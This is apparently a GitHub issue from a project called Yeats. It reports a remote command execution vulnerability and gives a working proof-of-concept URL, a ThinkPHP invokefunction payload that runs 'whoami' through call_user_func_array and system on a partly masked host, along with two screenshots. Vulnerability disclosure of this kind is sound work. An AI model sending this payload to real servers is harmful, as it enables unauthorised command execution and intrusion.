Yeats

Results 1 issues of Yeats

The RCE(Remote Command Execution) vulnerability is triggered by a http request.Successfully executed the command "whoami". poc: http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami ![default](https://user-images.githubusercontent.com/35087753/51068849-10bc7080-165f-11e9-81b7-0241880eec1c.png) ![default](https://user-images.githubusercontent.com/35087753/51068859-2d58a880-165f-11e9-9b11-3d9feff8c0a8.png)